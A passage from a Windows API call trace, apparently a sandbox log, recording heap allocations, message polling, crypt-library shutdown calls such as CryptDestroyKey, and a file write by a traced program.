Flags=0x0, Size=0x10) returned 0x2e51328 [0233.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0233.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0233.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0233.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0233.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0233.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0233.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0233.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0233.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0233.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0233.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0233.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0233.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0233.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0233.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0233.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0233.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0233.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0233.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0233.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0233.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0233.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0233.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0233.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0233.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0233.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0233.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0233.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0233.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0233.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0233.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0233.642] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0233.642] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04038 [0233.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0233.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0233.642] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0233.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0233.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.642] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0233.642] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0233.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0233.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0233.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0233.642] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0233.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0233.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0233.643] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.643] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0233.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0233.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0233.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0233.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0233.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0233.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0233.649] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0x67e8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0x67e8, lpOverlapped=0x0) returned 1 [0233.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0233.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0233.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0233.653] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0233.653] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0233.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0233.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0233.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0233.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0233.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0233.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0233.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.653] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0233.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0233.654] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0233.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0233.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0233.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0233.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0233.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0233.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50fc8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0233.654] CryptDestroyKey (hKey=0xa87110) returned 1 [0233.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0233.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0233.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0233.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0233.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0233.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0233.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0233.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0233.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0233.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0233.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0233.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0233.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0233.656] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0233.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0233.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0233.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0233.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0233.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0233.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.656] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0233.656] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0233.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0233.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0233.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0233.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0233.657] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0233.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0233.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.657] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0233.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0233.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0233.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0233.657] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0233.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0233.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.657] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0233.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0233.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.657] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0233.657] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0233.657] HeapFree 